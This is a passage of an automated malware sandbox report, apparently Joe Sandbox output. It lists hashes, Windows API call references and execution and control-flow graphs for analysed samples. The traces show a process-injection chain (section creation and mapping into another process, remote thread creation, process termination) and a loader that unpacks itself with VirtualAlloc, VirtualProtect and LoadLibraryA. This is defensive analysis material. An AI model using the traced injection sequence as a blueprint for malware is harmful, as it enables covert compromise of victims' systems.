                                                                              • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                              • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                              • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                              • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774700737.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                              • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                              • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                              • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                                                              APIs
                                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 00417491
                                                                              • WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 004174B5
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004174BD
                                                                              • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004174FD
                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00417511
                                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041751F
                                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 0041752E
                                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041753F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                              • String ID: -
                                                                              • API String ID: 113859268-2547889144
                                                                              • Opcode ID: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
                                                                              • Instruction ID: a463e9529dcf8072e3b7220abe1072026f108712342e539d7c254fb5de8a9354
                                                                              • Opcode Fuzzy Hash: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
                                                                              • Instruction Fuzzy Hash: 7A21D830A8430CABE7209F60DC85FDD7F70EB0C755F1181AAF749AA1C0CAB41AC88B59
                                                                              APIs
                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004175B4
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004175CF
                                                                              • HeapDestroy.KERNEL32(00000000), ref: 004175EE
                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004175FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1774733616.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_40b000_1HGXcC63iu.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                              • String ID:
                                                                              • API String ID: 4159173863-0
                                                                              • Opcode ID: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
                                                                              • Instruction ID: 3d7b8869d9909e6524e9da05564ce57d4bd3bf1de3f4668ec111e10b9b533a75
                                                                              • Opcode Fuzzy Hash: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
                                                                              • Instruction Fuzzy Hash: 4701D4B1A441089BD750EB64ED85BEA37B8EB0C746F41402AF709A7281DF742944CF59

                                                                              Execution Graph

                                                                              Execution Coverage:9.5%
                                                                              Dynamic/Decrypted Code Coverage:28.7%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:171
                                                                              Total number of Limit Nodes:5
                                                                              execution_graph 3420 402e40 3422 402e37 3420->3422 3423 402edf 3422->3423 3424 4018e6 3422->3424 3425 4018f5 3424->3425 3426 40192e Sleep 3425->3426 3427 401949 3426->3427 3429 40195a 3427->3429 3430 401514 3427->3430 3429->3423 3431 401524 3430->3431 3432 4015c4 NtDuplicateObject 3431->3432 3438 4016e0 3431->3438 3433 4015e1 NtCreateSection 3432->3433 3432->3438 3434 401661 NtCreateSection 3433->3434 3435 401607 NtMapViewOfSection 3433->3435 3437 40168d 3434->3437 3434->3438 3435->3434 3436 40162a NtMapViewOfSection 3435->3436 3436->3434 3439 401648 3436->3439 3437->3438 3440 401697 NtMapViewOfSection 3437->3440 3438->3429 3439->3434 3440->3438 3441 4016be NtMapViewOfSection 3440->3441 3441->3438 3442 4179e0 3445 417620 3442->3445 3444 4179e5 3446 41762d 3445->3446 3447 417820 3446->3447 3448 4176e7 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW 3446->3448 3449 417830 SetCommState 3447->3449 3455 417849 3447->3455 3450 41774b 7 API calls 3448->3450 3449->3447 3451 417801 3450->3451 3452 4177f8 GetBoundsRect 3450->3452 3453 417811 3451->3453 3454 41780a PulseEvent 3451->3454 3452->3451 3453->3447 3454->3453 3456 417852 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 3455->3456 3463 417887 3455->3463 3456->3463 3460 4178c4 LoadLibraryA 3468 417290 GetModuleHandleW GetProcAddress VirtualProtect 3460->3468 3461 41791d 3469 417580 3461->3469 3467 417260 LocalAlloc 3463->3467 3464 417922 3465 417959 InterlockedDecrement 3464->3465 3466 41796f 3464->3466 3465->3464 3466->3444 3467->3460 3468->3461 3470 4175a9 QueryDosDeviceA 3469->3470 3471 4175ba 3469->3471 3470->3471 3480 417420 3471->3480 3474 4175d5 3483 417460 3474->3483 3475 4175cd FreeEnvironmentStringsA 3475->3474 3478 417603 3478->3464 3479 4175ec HeapDestroy GetNumaProcessorNode 3479->3478 3481 417431 FatalAppExitA GetModuleHandleW 3480->3481 3482 417443 3480->3482 3481->3482 3482->3474 3482->3475 3484 41746d 3483->3484 3485 417499 3484->3485 3486 417488 BuildCommDCBA 3484->3486 3487 4174a1 WritePrivateProfileStringA FreeEnvironmentStringsA 3485->3487 3490 4174c3 3485->3490 3486->3490 3487->3490 3488 41754a 3488->3478 3488->3479 3490->3488 3491 4174f9 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3490->3491 3492 417450 3490->3492 3491->3490 3495 4173e0 3492->3495 3496 417409 3495->3496 3497 4173fc SetEvent 3495->3497 3496->3490 3497->3496 3551 4178e3 3552 4178f0 LoadLibraryA 3551->3552 3560 417290 GetModuleHandleW GetProcAddress VirtualProtect 3552->3560 3555 41791d 3556 417580 15 API calls 3555->3556 3557 417922 3556->3557 3558 417959 InterlockedDecrement 3557->3558 3559 41796f 3557->3559 3558->3557 3560->3555 3606 401542 3607 40153b 3606->3607 3608 4015c4 NtDuplicateObject 3607->3608 3609 4016e0 3607->3609 3608->3609 3610 4015e1 NtCreateSection 3608->3610 3611 401661 NtCreateSection 3610->3611 3612 401607 NtMapViewOfSection 3610->3612 3611->3609 3614 40168d 3611->3614 3612->3611 3613 40162a NtMapViewOfSection 3612->3613 3613->3611 3617 401648 3613->3617 3614->3609 3615 401697 NtMapViewOfSection 3614->3615 3615->3609 3616 4016be NtMapViewOfSection 3615->3616 3616->3609 3617->3611 3498 2da057f 3501 2da0590 3498->3501 3502 2da059f 3501->3502 3505 2da0d30 3502->3505 3507 2da0d4b 3505->3507 3506 2da0d54 CreateToolhelp32Snapshot 3506->3507 3508 2da0d70 Module32First 3506->3508 3507->3506 3507->3508 3509 2da0d7f 3508->3509 3510 2da058f 3508->3510 3512 2da09ef 3509->3512 3513 2da0a1a 3512->3513 3514 2da0a2b VirtualAlloc 3513->3514 3515 2da0a63 3513->3515 3514->3515 3515->3515 3520 2b7003c 3521 2b70049 3520->3521 3533 2b70e0f SetErrorMode SetErrorMode 3521->3533 3526 2b70265 3527 2b702ce VirtualProtect 3526->3527 3529 2b7030b 3527->3529 3528 2b70439 VirtualFree 3532 2b704be LoadLibraryA 3528->3532 3529->3528 3531 2b708c7 3532->3531 3534 2b70223 3533->3534 3535 2b70d90 3534->3535 3536 2b70dad 3535->3536 3537 2b70dbb GetPEB 3536->3537 3538 2b70238 VirtualAlloc 3536->3538 3537->3538 3538->3526 3665 402dd0 3666 402ddc 3665->3666 3667 4018e6 8 API calls 3666->3667 3668 402edf 3666->3668 3667->3668 3561 4018f1 3562 4018f6 3561->3562 3563 40192e Sleep 3562->3563 3564 401949 3563->3564 3565 401514 7 API calls 3564->3565 3566 40195a 3564->3566 3565->3566 3567 2b70005 3572 2b7092b GetPEB 3567->3572 3569 2b70030 3574 2b7003c 3569->3574 3573 2b70972 3572->3573 3573->3569 3575 2b70049 3574->3575 3576 2b70e0f 2 API calls 3575->3576 3577 2b70223 3576->3577 3578 2b70d90 GetPEB 3577->3578 3579 2b70238 VirtualAlloc 3578->3579 3580 2b70265 3579->3580 3581 2b702ce VirtualProtect 3580->3581 3583 2b7030b 3581->3583 3582 2b70439 VirtualFree 3586 2b704be LoadLibraryA 3582->3586 3583->3582 3585 2b708c7 3586->3585 3652 401915 3653 4018c6 3652->3653 3654 40191a 3652->3654 3655 40192e Sleep 3654->3655 3656 401949 3655->3656 3657 401514 7 API calls 3656->3657 3658 40195a 3656->3658 3657->3658 3587 2b70001 3588 2b70005 3587->3588 3589 2b7092b GetPEB 3588->3589 3590 2b70030 3589->3590 3591 2b7003c 7 API calls 3590->3591 3592 2b70038 3591->3592 3516 402f97 3517 4030ee 3516->3517 3518 402fc1 3516->3518 3518->3517 3519 40307c RtlCreateUserThread NtTerminateProcess 3518->3519 3519->3517 3642 402d7b 3645 402d38 3642->3645 3643 402dc7 3644 4018e6 8 API calls 3644->3643 3645->3642 3645->3643 3645->3644 3593 4014fe 3594 401506 3593->3594 3595 401531 3593->3595 3596 4015c4 NtDuplicateObject 3595->3596 3602 4016e0 3595->3602 3597 4015e1 NtCreateSection 3596->3597 3596->3602 3598 401661 NtCreateSection 3597->3598 3599 401607 NtMapViewOfSection 3597->3599 3601 40168d 3598->3601 3598->3602 3599->3598 3600 40162a NtMapViewOfSection 3599->3600 3600->3598 3603 401648 3600->3603 3601->3602 3604 401697 NtMapViewOfSection 3601->3604 3603->3598 3604->3602 3605 4016be NtMapViewOfSection 3604->3605 3605->3602

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 176 4018a5-4018b7 170->176 174 401595-4015be 171->174 175 401896 171->175 174->175 185 4015c4-4015db NtDuplicateObject 174->185 175->176 181 4018c5 176->181 182 4018bc-4018e3 call 401193 176->182 181->182 185->175 187 4015e1-401605 NtCreateSection 185->187 188 401661-401687 NtCreateSection 187->188 189 401607-401628 NtMapViewOfSection 187->189 188->175 192 40168d-401691 188->192 189->188 191 40162a-401646 NtMapViewOfSection 189->191 191->188 194 401648-40165e 191->194 192->175 195 401697-4016b8 NtMapViewOfSection 192->195 194->188 195->175 197 4016be-4016da NtMapViewOfSection 195->197 197->175 200 4016e0 call 4016e5 197->200
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 223 4018a5-4018b7 217->223 221 401595-4015be 218->221 222 401896 218->222 221->222 232 4015c4-4015db NtDuplicateObject 221->232 222->223 228 4018c5 223->228 229 4018bc-4018e3 call 401193 223->229 228->229 232->222 234 4015e1-401605 NtCreateSection 232->234 235 401661-401687 NtCreateSection 234->235 236 401607-401628 NtMapViewOfSection 234->236 235->222 239 40168d-401691 235->239 236->235 238 40162a-401646 NtMapViewOfSection 236->238 238->235 241 401648-40165e 238->241 239->222 242 401697-4016b8 NtMapViewOfSection 239->242 241->235 242->222 244 4016be-4016da NtMapViewOfSection 242->244 244->222 247 4016e0 call 4016e5 244->247
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                              • String ID:
                                                                              • API String ID: 1652636561-0
                                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 267 4018a5-4018b7 261->267 265 401595-4015be 262->265 266 401896 262->266 265->266 276 4015c4-4015db NtDuplicateObject 265->276 266->267 272 4018c5 267->272 273 4018bc-4018e3 call 401193 267->273 272->273 276->266 278 4015e1-401605 NtCreateSection 276->278 279 401661-401687 NtCreateSection 278->279 280 401607-401628 NtMapViewOfSection 278->280 279->266 283 40168d-401691 279->283 280->279 282 40162a-401646 NtMapViewOfSection 280->282 282->279 285 401648-40165e 282->285 283->266 286 401697-4016b8 NtMapViewOfSection 283->286 285->279 286->266 288 4016be-4016da NtMapViewOfSection 286->288 288->266 291 4016e0 call 4016e5 288->291
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 306 4018a5-4018b7 300->306 304 401595-4015be 301->304 305 401896 301->305 304->305 315 4015c4-4015db NtDuplicateObject 304->315 305->306 311 4018c5 306->311 312 4018bc-4018e3 call 401193 306->312 311->312 315->305 317 4015e1-401605 NtCreateSection 315->317 318 401661-401687 NtCreateSection 317->318 319 401607-401628 NtMapViewOfSection 317->319 318->305 322 40168d-401691 318->322 319->318 321 40162a-401646 NtMapViewOfSection 319->321 321->318 324 401648-40165e 321->324 322->305 325 401697-4016b8 NtMapViewOfSection 322->325 324->318 325->305 327 4016be-4016da NtMapViewOfSection 325->327 327->305 330 4016e0 call 4016e5 327->330
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 346 4018a5-4018b7 340->346 344 401595-4015be 341->344 345 401896 341->345 344->345 355 4015c4-4015db NtDuplicateObject 344->355 345->346 351 4018c5 346->351 352 4018bc-4018e3 call 401193 346->352 351->352 355->345 357 4015e1-401605 NtCreateSection 355->357 358 401661-401687 NtCreateSection 357->358 359 401607-401628 NtMapViewOfSection 357->359 358->345 362 40168d-401691 358->362 359->358 361 40162a-401646 NtMapViewOfSection 359->361 361->358 364 401648-40165e 361->364 362->345 365 401697-4016b8 NtMapViewOfSection 362->365 364->358 365->345 367 4016be-4016da NtMapViewOfSection 365->367 367->345 370 4016e0 call 4016e5 367->370
                                                                              APIs
                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                              • String ID:
                                                                              • API String ID: 1546783058-0
                                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 401 402f97-402fbb 402 402fc1-402fd9 401->402 403 4030ee-4030f3 401->403 402->403 404 402fdf-402ff0 402->404 405 402ff2-402ffb 404->405 406 403000-40300e 405->406 406->406 407 403010-403017 406->407 408 403039-403040 407->408 409 403019-403038 407->409 410 403062-403065 408->410 411 403042-403061 408->411 409->408 412 403067-40306a 410->412 413 40306e 410->413 411->410 412->413 414 40306c 412->414 413->405 415 403070-403075 413->415 414->415 415->403 416 403077-40307a 415->416 416->403 417 40307c-4030eb RtlCreateUserThread NtTerminateProcess 416->417 417->403
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                              • String ID:
                                                                              • API String ID: 1921587553-0
                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 417620-417648 2 417650-417657 0->2 3 417659-41765b 2->3 4 41765f-417665 2->4 3->4 5 417667-417671 4->5 6 417676-417680 4->6 5->6 7 417682-41768e 6->7 8 417698-41769f 6->8 7->8 8->2 9 4176a1-4176a9 8->9 11 4176b0-4176b6 9->11 12 4176c4-4176cb 11->12 13 4176b8-4176be 11->13 14 4176d1-4176d8 12->14 15 4176cd 12->15 13->12 14->11 16 4176da-4176e1 14->16 15->14 17 417820-41782e 16->17 18 4176e7-4177f6 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 417830-41783e SetCommState 17->19 21 417801-417808 18->21 22 4177f8-4177fb GetBoundsRect 18->22 26 417840-417847 19->26 27 417849-417850 19->27 24 417811-41781d 21->24 25 41780a-41780b PulseEvent 21->25 22->21 24->17 25->24 26->19 26->27 28 417852-4178b9 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 27->28 29 4178bf-4178ce call 417260 27->29 28->29 34 4178d0-4178e1 29->34 35 41790d-417918 LoadLibraryA call 417290 29->35 38 4178f0-417900 34->38 42 41791d-41792e call 417580 35->42 40 417902 38->40 41 417908-41790b 38->41 40->41 41->35 41->38 47 417930-417937 42->47 48 417943-417949 47->48 49 417939-41793f 47->49 50 417950-417957 48->50 51 41794b call 417280 48->51 49->48 55 417966-41796d 50->55 56 417959-417960 InterlockedDecrement 50->56 51->50 55->47 57 41796f-41797f 55->57 56->55 59 417980-417990 57->59 60 417992 59->60 61 417999-41799c 59->61 60->61 61->59 63 41799e-4179a9 61->63 64 4179b0-4179b5 63->64 66 4179b7-4179bd 64->66 67 4179bf-4179c5 64->67 66->67 68 4179c7-4179d4 66->68 67->64 67->68
                                                                              APIs
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004176F0
                                                                              • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417709
                                                                              • FindAtomW.KERNEL32(00000000), ref: 00417710
                                                                              • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417718
                                                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00417730
                                                                              • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417757
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0041775F
                                                                              • GetVersionExW.KERNEL32(?), ref: 0041776C
                                                                              • DisconnectNamedPipe.KERNEL32(?), ref: 0041777F
                                                                              • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004177C4
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 004177D3
                                                                              • LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004177E9
                                                                              • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004177FB
                                                                              • PulseEvent.KERNEL32(00000000), ref: 0041780B
                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 00417834
                                                                              • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417861
                                                                              • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417872
                                                                              • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041787A
                                                                              • LoadLibraryA.KERNELBASE(004193F8), ref: 00417912
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
